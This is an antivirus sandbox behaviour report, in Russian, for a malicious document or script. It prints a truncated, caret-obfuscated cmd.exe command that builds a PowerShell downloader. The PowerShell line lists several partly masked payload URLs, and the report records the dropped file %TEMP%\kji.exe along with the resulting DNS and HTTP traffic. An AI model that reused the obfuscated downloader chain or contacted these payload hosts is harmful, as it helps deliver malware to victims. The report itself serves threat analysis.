Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \C"s^e^t ^[-^.=^'O^p^s';$n^Bf^='^htt&&set \^+?^.=^an^e^lapr&&^s^e^t ^#^,^$@=^.^P^at&&^s^e^t '^~=ervi&&s^e^t +^.=^w-Ob^j^ect&&^se^t ^#}^_=e^ll^ ^$z^Zo^=&&s^e^t ^[,*^+=n^t^s&&s^e^t '^`^.=^e&&^se^...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\kji.exe
Сетевая активность
Подключается к
- 'zh####iabirdnest.co':80
- 'ai######gementservices.com':80
TCP
Запросы HTTP GET
- http://zh####iabirdnest.co/PUxAY
- http://ai######gementservices.com/wp-content/uploads/m
- http://ai######gementservices.com/cgi-sys/suspendedpage.cgi
UDP
- DNS ASK zh####iabirdnest.co
- DNS ASK pa####preta.com.br
- DNS ASK si###ntor.es
- DNS ASK ai######gementservices.com
- DNS ASK ke###erkol.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \C"s^e^t ^[-^.=^'O^p^s';$n^Bf^='^htt&&set \^+?^.=^an^e^lapr&&^s^e^t ^#^,^$@=^.^P^at&&^s^e^t '^~=ervi&&s^e^t +^.=^w-Ob^j^ect&&^se^t ^#}^_=e^ll^ ^$z^Zo^=&&s^e^t ^[,*^+=n^t^s&&s^e^t '^`^.=^e&&^se^...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $zZo='Ops';$nBf='http://zh####iabirdnest.co/PUxAY@http://panelapreta.com.br/b0kQ7Q8@http://sitrantor.es/LdLr6F8A@http://aionmanagementservices.com/wp-content/uploads/m@http://kemalerkol.net/nYp...
